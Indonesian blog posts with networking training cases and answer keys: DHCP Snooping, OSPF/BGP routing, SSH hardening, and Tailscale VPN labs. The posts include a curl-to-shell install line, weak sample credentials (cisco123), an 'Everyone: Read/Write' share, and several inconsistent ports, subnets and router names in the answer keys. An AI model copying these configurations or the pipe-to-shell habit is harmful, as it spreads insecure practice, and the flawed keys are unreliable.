Gateway diubah menjadi 192.168.2.1 dan koneksi ke server pusat 192.168.1.10 berhasil dilakukan setelahnya.

05. Mengatasi Serangan pada Jaringan

Hasan Amin — Sun, 13 Apr 2025 01:30:41 GMT

📚 Studi Kasus:

PT Aman Jaya mengelola jaringan kantor pusat dengan sistem distribusi IP otomatis menggunakan DHCP. Baru-baru ini, tim IT menemukan adanya serangan DHCP Starvation dari perangkat tidak dikenal yang mengirimkan banyak permintaan DHCP secara terus-menerus. Akibatnya, perangkat sah tidak mendapatkan alamat IP.

Administrator jaringan diminta untuk mengamankan jaringan dengan fitur DHCP Snooping, agar hanya perangkat yang terpercaya yang dapat mengirim permintaan DHCP.

🧑‍💻 Tugas:

Aktifkan fitur DHCP Snooping pada switch utama.
Tentukan port yang dipercaya (trusted port) yaitu port yang mengarah ke DHCP server.
Tandai port-port yang terhubung ke pengguna sebagai untrusted.
Uji apakah serangan DHCP Starvation berhasil dicegah setelah konfigurasi.

📸 Dokumentasi yang harus dikumpulkan:

✔ Screenshot konfigurasi DHCP Snooping
✔ Output hasil uji coba (misalnya: show ip dhcp snooping binding, atau hasil gagalnya request DHCP dari penyerang)

✅ Kunci Jawaban Soal Training No. 4 – DHCP Snooping

🔧 Asumsi Topologi Sederhana:

Switch SW1 (switch utama)
Port Fa0/1: Terhubung ke DHCP Server → trusted
Port Fa0/2 - Fa0/24: Terhubung ke pengguna atau PC → untrusted
DHCP attacker menggunakan Fa0/3

⚙️ Langkah Konfigurasi di SW1:

SW1> enable
SW1# configure terminal
SW1(config)# ip dhcp snooping
SW1(config)# ip dhcp snooping vlan 10

➡️ Menandai port trusted (ke DHCP Server di Fa0/1):

SW1(config)# interface FastEthernet0/1
SW1(config-if)# ip dhcp snooping trust
SW1(config-if)# exit

➡️ Menonaktifkan trust untuk port pengguna (default: untrusted), tapi bisa eksplisit juga:

SW1(config)# interface range FastEthernet3/1
SW1(config-if-range)# no ip dhcp snooping trust
SW1(config-if-range)# exit

✅ Verifikasi dan Pengujian:

SW1# show ip dhcp snooping
SW1# show ip dhcp snooping binding

➡️ Jika attacker tetap mencoba flooding, maka:

Tidak akan dapat lease IP.
Traffic DHCP dari FastEthernet3/1 akan diblock oleh switch karena berasal dari untrusted port.

03. Routing Antar Autonomous System (Analogi Perusahaan)

Hasan Amin — Sun, 13 Apr 2025 01:25:30 GMT

📚 Studi Kasus:

PT Nusantara Digital adalah sebuah perusahaan besar yang memiliki beberapa divisi internal, seperti Divisi Riset dan Divisi Produksi. Untuk komunikasi antar divisi, mereka menggunakan protokol routing internal OSPF dalam AS 65100.

Di sisi lain, PT Nusantara Digital bekerja sama dengan perusahaan partner yaitu PT Mitra Solusi, yang memiliki jaringan sendiri dan menggunakan BGP dalam AS 65200.

Agar komunikasi antara jaringan internal dan partner bisnis tetap lancar dan aman, administrator jaringan diminta untuk mengonfigurasi routing antar Autonomous System.

🧑‍💻 Tugas:

Konfigurasikan OSPF untuk komunikasi antar divisi dalam AS 65100 (PT Nusantara Digital).
Konfigurasikan BGP untuk komunikasi eksternal antara PT Nusantara Digital (AS 65100) dan PT Mitra Solusi (AS 65200).
Pastikan komunikasi antar divisi internal dan partner eksternal berjalan dengan baik.

📸 Dokumentasi yang harus dikumpulkan:

✔ Screenshot konfigurasi OSPF dan BGP
✔ Output dari:
show ip route
show ip bgp summary

✅ Kunci Jawaban Soal Training No. 3 – Versi Perusahaan

⚙️ Topologi Sederhana (Simulasi):

Router R2 = PT Nusantara Digital (AS 65100)
Router R3 = PT Mitra Solusi (AS 65200)
Koneksi antar router = 192.168.100.1 <--> 192.168.100.2
Network internal R1 = 10.10.10.0/24
Network internal R2 = 172.16.20.0/24

🔧 Konfigurasi Router R2 (AS 65100 - OSPF & BGP)

R2> enable
R2# configure terminal
R2(config)#interface GigabitEthernet0/0/1
R2(config-if)# ip address 192.168.100.1 255.255.255.0
R2(config-if)# no shutdown
R2(config-if)# exit

R2(config)# router ospf 1
R2(config-router)# network 192.168.2.0 0.0.0.255 area 0
R2(config-router)# exit

R2(config)# router bgp 65100
R2(config-router)# neighbor 192.168.100.2 remote-as 65200
R2(config-router)# network 192.168.2.0 mask 255.255.255.0
R2(config-router)# exit
R2(config)# exit

🔧 Konfigurasi Router R3 (AS 65200 - BGP)

R3> enable
R3# configure terminal
R3(config)#interface GigabitEthernet0/0/0
R3(config-if)# ip address 192.168.100.2 255.255.255.0
R3(config-if)# no shutdown
R3(config-if)# exit

R3(config)#interface GigabitEthernet0/0/1
R3(config-if)# ip address 172.16.20.1 255.255.255.0
R3(config-if)# no shutdown
R3(config-if)# exit

R3(config)# ip dhcp excluded-address 172.16.20.1 172.16.20.9
R3(config)# ip dhcp pool Untirta
R3(dhcp-config)# network 172.16.20.0 255.255.255.0
R3(dhcp-config)# default-router 172.16.20.1
R3(dhcp-config)# dns-server 8.8.8.8
R3(dhcp-config)# exit

R3(config)# router bgp 65200
R3(config-router)# neighbor 192.168.100.1 remote-as 65100
R3(config-router)# network 172.16.20.0 mask 255.255.255.0
R3(config-router)# exit
R3(config)# exit

✅ Verifikasi Routing:

Di R1:

R2# show ip route

(Harus terlihat rute ke 172.16.20.0/24 via BGP)

R2# show ip bgp summary

(Harus terlihat BGP state Established dengan 192.168.100.2)

02. Merancang Keamanan Jaringan

Hasan Amin — Sat, 12 Apr 2025 04:41:08 GMT

📚 Studi Kasus Baru:

Administrator jaringan mendapati bahwa beberapa teknisi lapangan masih menggunakan Telnet untuk mengakses router cabang, padahal hal ini sangat rentan terhadap penyadapan. Atas permintaan manajer IT, Anda diminta untuk:

Meningkatkan keamanan manajemen perangkat dengan mengaktifkan SSH.
Menonaktifkan akses Telnet.
Memberikan izin akses SSH hanya dari subnet kantor teknisi pusat (192.168.1.0/24).

🧑‍💻 Tugas:

Konfigurasikan akses remote menggunakan SSH pada router cabang.
Nonaktifkan Telnet.
Batasi akses SSH hanya dari subnet 192.168.1.0/24.
Verifikasi bahwa akses remote hanya dapat dilakukan dari subnet yang diizinkan.

📸 Dokumentasi yang harus dikumpulkan:

Screenshot konfigurasi keamanan di router.
Hasil verifikasi remote SSH dari subnet yang diizinkan dan yang tidak diizinkan.

✅ Kunci Jawaban Soal Training:

💻 Konfigurasi SSH di Router1:

Router> enable
Router# configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

Router(config)# hostname R1
R1(config)# ip domain-name training.lab
R1(config)# username cisco privilege 15 password cisco123

R1(config)# crypto key generate rsa
The name for the keys will be: R1.training.lab
Choose the size of the key modulus in the range of 360 to 2048 for your
  General Purpose Keys. Choosing a key modulus greater than 512 may take
  a few minutes.

How many bits in the modulus [512]: 1024
% Generating 1024 bit RSA keys, keys will be non-exportable...[OK]

R1(config)# ip ssh version 2

R1(config)# access-list 10 permit 192.168.1.0 0.0.0.255

R1(config)# line vty 0 4
R1(config-line)# login local
R1(config-line)# transport input ssh
R1(config-line)# access-class 10 in
R1(config-line)# exit

R1(config)# exit
R1#write memory

🧪 Verifikasi Konfigurasi:

Verifikasi SSH aktif dan Telnet dinonaktifkan:

R1# show run | include ssh

Verifikasi ACL akses SSH:

R1# show access-lists

Uji koneksi SSH dari PC di subnet 192.168.10.0/24:

PC> ssh -l cisco 192.168.1.1
Password: cisco123
R1>

Uji dari subnet lain (misal 192.168.2.0/24) harus gagal:

PC> ssh -l cisco 192.168.1.1
# Hasil: Connection refused / access denied

📸 Screenshot yang dikumpulkan:

Konfigurasi SSH (show run | section line vty)
show access-lists ACL SSH
Terminal SSH dari subnet yang diizinkan (berhasil)
Terminal SSH dari subnet yang tidak diizinkan (gagal)

🔗 Praktikum Interkoneksi Jaringan Antar Kelompok Menggunakan Tailscale (Full Windows)

Hasan Amin — Fri, 11 Apr 2025 04:18:26 GMT

📘 Pendahuluan

Pada praktikum ini, mahasiswa akan belajar bagaimana menghubungkan banyak jaringan berbeda yang tersebar dalam subnet masing-masing (karena setiap kelompok menggunakan hotspot HP yang berbeda), sehingga dapat berkomunikasi antar jaringan seperti layaknya berada di satu LAN.

Solusi yang digunakan adalah Tailscale, VPN modern berbasis WireGuard yang memungkinkan komunikasi antar perangkat meskipun berada di jaringan NAT, hotspot, atau jaringan publik yang berbeda-beda.

🎯 Tujuan Praktikum

Menghubungkan 10 kelompok yang berada di jaringan berbeda dalam satu jaringan virtual
Mengakses layanan antar perangkat (file sharing, web service)
Membangun komunikasi peer-to-peer antar kelompok
Memahami konsep routing dan virtual LAN

🧑‍🤝‍🧑 Struktur Kelompok

Total: 10 Kelompok
Tiap kelompok terdiri dari 3 orang
Setiap kelompok terkoneksi ke internet melalui hotspot HP masing-masing (berbeda subnet)
Salah satu laptop tiap kelompok akan menjadi perangkat utama (host Tailscale)

📦 Persiapan Sebelum Praktikum

Untuk Dosen:

Buat akun di https://tailscale.com
Masuk ke dashboard admin:
https://login.tailscale.com/admin/machines
Buat tim organisasi

Buatkan invite link:

 https://login.tailscale.com/admin/invite

Bagikan link ini ke tiap kelompok untuk login ke jaringan virtual yang sama

🛠️ Langkah-Langkah Praktikum Tiap Kelompok

📌 A. Instalasi Tailscale di Windows

Download installer dari:
👉 https://tailscale.com/download
Jalankan installer, ikuti petunjuk instalasi
Setelah selesai, login menggunakan akun Google/Microsoft melalui link invite dari dosen
Pastikan aplikasi Tailscale berjalan di system tray dan statusnya Connected

📌 B. Struktur Perangkat Tiap Kelompok

Laptop A: Menjadi host utama (terinstall Tailscale)
Laptop B dan C: Terhubung ke jaringan lokal yang sama (via hotspot)

👉 Catatan: Semua laptop bisa diinstal Tailscale jika ingin komunikasi langsung. Tapi cukup 1 laptop per kelompok juga cukup untuk gateway komunikasi.

📌 C. Akses Antar Kelompok

Klik kanan ikon Tailscale (system tray) → “Show Tailscale IP”
Catat IP 100.x.x.x dari tiap kelompok
Tes koneksi dengan Command Prompt:
```
 ping 100.x.x.x
```
Jika ping berhasil, artinya koneksi antar jaringan berhasil.

💥 Challenge Antar Kelompok (Tiap Sesi)

💡 Challenge 1: Hosting Web Server Sederhana

Kelompok A membuat web server Python di Windows:

Pastikan Python sudah terinstal
Jalankan web server:
```
 python -m http.server 8000
```
Kelompok B mengakses:
```
 http://100.x.x.x:8000
```

Kelompok A:
- Klik kanan folder → Properties → Sharing → Advanced Sharing
- Centang “Share this folder”
- Beri nama share, contoh: shared-data
- Atur permission ke “Everyone: Read/Write”
Kelompok B:
- Tekan Win + R → ketik:
```
  \\100.x.x.x\shared-data
```
- Jika diminta login, masukkan username dan password Laptop A

💡 Challenge 3: Kirim Pesan via Simple Chat

Buat program sederhana untuk simulasi pengiriman data atau pesan.

Server (Kelompok A):

# save as server.py
import socket
s = socket.socket()
s.bind(('', 12345))
s.listen(1)
print("Menunggu koneksi...")
conn, addr = s.accept()
print("Terkoneksi dengan:", addr)
print("Pesan:", conn.recv(1024).decode())
conn.close()

Client (Kelompok B):

# save as client.py
import socket
s = socket.socket()
s.connect(("100.x.x.x", 12345))  # Ganti dengan IP kelompok A
s.send(b"Halo dari kelompok B")
s.close()

🧪 Evaluasi Praktikum

Tugas Tiap Kelompok:

Laporan:
- IP Tailscale masing-masing
- Log ping atau traceroute
- Service yang diakses dari kelompok lain
Screenshot:
- Koneksi berhasil
- Akses folder
- Web service tampil
Jawaban:
- Apa keuntungan Tailscale dibandingkan VPN biasa?
- Apa tantangan dalam mengakses device di jaringan berbeda?

🧠 Kesimpulan

Melalui praktikum ini, mahasiswa dapat:

Menghubungkan perangkat dari jaringan yang berbeda seolah berada di LAN yang sama
Menjalankan file sharing, web hosting, dan komunikasi data antar kelompok
Mengenal konsep VPN, IP routing, dan network traversal menggunakan teknologi modern seperti Tailscale

🌐 Remote Akses Jaringan LAN dengan Tailscale — Simulasi via Hotspot HP

Hasan Amin — Thu, 10 Apr 2025 12:10:44 GMT

Pernah ingin mengakses device di jaringan LAN dari jarak jauh tanpa harus ribet setup VPN manual, port forwarding, atau TeamViewer? Tailscale adalah solusi mudah untuk itu. Di artikel ini, kita akan bahas studi kasus remote akses ke laptop di jaringan LAN lokal via Tailscale dengan setup simpel menggunakan hotspot HP.

🧪 Studi Kasus

Bayangkan kamu punya 3 perangkat:

Perangkat	Sistem Operasi	Koneksi	Peran
Laptop A	Ubuntu	Hotspot HP	Gateway ke jaringan LAN (Tailscale router)
Laptop B	Windows	Hotspot HP	Target device (hosting file/web)
Laptop C	Windows	Modem (Internet)	Device remote dari lokasi berbeda

Tujuan kita: Laptop C (di luar jaringan) bisa mengakses Laptop B (yang berada di LAN hotspot) dengan bantuan Laptop A sebagai gateway.

🧠 Solusi: Subnet Routing dengan Tailscale

Kita akan:

Install Tailscale di Laptop A dan Laptop C
Set Laptop A sebagai subnet router untuk LAN tempat Laptop B berada
Akses Laptop B langsung dari Laptop C, lewat VPN yang ditangani oleh Tailscale

🛠️ Step-by-Step Instalasi & Setup

✅ 1. Install Tailscale di Laptop A (Ubuntu)

Buka terminal dan jalankan:

curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up

Kamu akan diminta login ke akun Google, Microsoft, atau GitHub. Gunakan akun yang sama untuk semua perangkat

✅ 2. Cek IP Laptop B

Pastikan Laptop A dan B terhubung di jaringan yang sama (hotspot dari HP).
Dari Laptop A, pastikan bisa ping Laptop B:

ping 192.168.43.X   # Ganti dengan IP dari Laptop B

Jika kamu ingin akses web service di Laptop B:

curl http://192.168.43.X:8080

✅ 3. Aktifkan Subnet Routing

Masih di Laptop A, aktifkan routing untuk jaringan LAN hotspot:

sudo tailscale up --advertise-routes=192.168.43.0/24

Ganti 192.168.43.0/24 dengan subnet hotspot HP kamu.

✅ 4. Aktifkan Routing di Dashboard Tailscale

Buka: https://login.tailscale.com/admin/machines
Klik pada nama Laptop A
Klik tombol Enable subnet routes
Selesai!

✅ 5. Install Tailscale di Laptop C (Windows)

Download Tailscale untuk Windows dari https://tailscale.com/download
Install, lalu login dengan akun yang sama
Tailscale akan otomatis tersambung ke jaringan privat

✅ 6. Akses Laptop B dari Laptop C

Sekarang kamu dari Laptop C bisa langsung akses Laptop B melalui IP-nya:

ping 192.168.43.X
curl http://192.168.43.X:8080

Jika Laptop B punya folder sharing, kamu bisa akses dari Windows Explorer:

\\192.168.43.X\SharedFolder

💡 Apa yang Terjadi di Balik Layar?

Laptop A menjadi router virtual untuk subnet 192.168.43.0/24
Laptop C mengakses jaringan VPN yang mencakup semua subnet tersebut
Tanpa perlu port forwarding, public IP, atau akses router
Semua terkoneksi peer-to-peer secara aman menggunakan WireGuard + NAT traversal

📌 Tips Tambahan

Aktifkan MagicDNS agar tidak perlu hafal IP
Gunakan --accept-routes saat tailsca``le up di Laptop C jika perlu otomatis routing
Aktifkan ACL jika ingin membatasi akses antar device

✅ Kesimpulan

Dengan Tailscale, kamu bisa:

Remote ke jaringan lokal dari mana saja
Tidak perlu konfigurasi VPN manual
Tidak butuh IP publik atau port forwarding
Akses device di LAN seperti berada di lokasi yang sama

Jika kamu suka artikel seperti ini dan ingin lebih banyak tutorial praktis seputar jaringan dan remote access, follow blog ini atau tinggalkan komentar ya!

💬 Punya kasus serupa di proyek nyata? Ceritakan di kolom komentar — kita bisa eksplorasi bareng!

My Blog

Cisco Packet Tracer

Pendahuluan

🧱 1. Merancang Topologi Jaringan

Langkah-langkah:

🏷️ 2. Menambahkan Label

🌐 3. Konfigurasi IP Address

a. Router

b. Server

c. Wireless Router

d. PC & Laptop

🔁 4. Konfigurasi Routing (RIP)

⚙️ 5. Konfigurasi Layanan Server

🧭 a. DNS Server

🌍 b. Web Server

✉️ c. Email Server

📁 d. FTP Server

🧪 e. Uji Coba

🔒 6. Konfigurasi Firewall Server

💾 7. Backup & Restore Konfigurasi

✅ Hasil Akhir yang Diharapkan

Bonus Pelatihan

🔹 Studi Kasus:

🧠 Pertanyaan

💡 Bagian 1: Topologi & Koneksi

💡 Bagian 2: DHCP dan Wireless Router

💡 Bagian 3: Routing dan IP Addressing

💡 Bagian 4: Konfigurasi Server

💡 Bagian 5: Keamanan Jaringan (Firewall)

💡 Bagian 6: Backup dan Restore

💡 Bagian 7: Troubleshooting

Perangkat yang Dibutuhkan:

Skema Koneksi

Langkah 1: Konfigurasi Dasar Router dan DHCP

Router1 (Gateway Utama)

Wireless Router Configuration

Langkah 2: Konfigurasi Routing

Router1 (Static Routing)

Router2 (RIP Routing)

Router3 (RIP Routing)

Langkah 3: Konfigurasi Server

DNS Server (IP: 10.10.10.2)

Web Server (IP: 40.40.40.2)

Email Server (IP: 40.40.40.3)

FTP Server (IP: 40.40.40.4)

Langkah 4: Konfigurasi Firewall

Router1 (ACL)

Langkah 5: Uji Coba Jaringan

Uji DNS dan Web

Uji Email

Uji FTP

Uji Wireless

Langkah 6: Backup dan Restore Konfigurasi

Backup Konfigurasi Router

Restore Konfigurasi Router

Troubleshooting

Membuat QR Code Scanner USB ke MQTT Gateway di Linux Menggunakan Python

Pendahuluan

Prasyarat

1. Cek dan Identifikasi Scanner USB

2. Instalasi Library yang Dibutuhkan

3. Struktur Kode Scanner

4. Buat Service Systemd

5. Troubleshooting

6. Penutup

🔥Multitier Realtime Chart Sensor Suhu via MQTT, MySQL, dan WebSocket

🌐 Arsitektur Tiga Server

📦 Persiapan Instalasi

Server 1: Install Node.js & Backend

Server 2: Install MySQL

Server 3: Web Server (optional)

🗄️ Konfigurasi Database (Server 2)

🧠 Backend (Server 1)

1. Struktur Folder

Penjelasan:

2. Install Modul

Penjelasan langkah demi langkah:

3. Kode server.js

🎨 Frontend (Server 3)

1. HTML File (index.html)

3. Kode `server.js`

1. HTML File (`index.html`)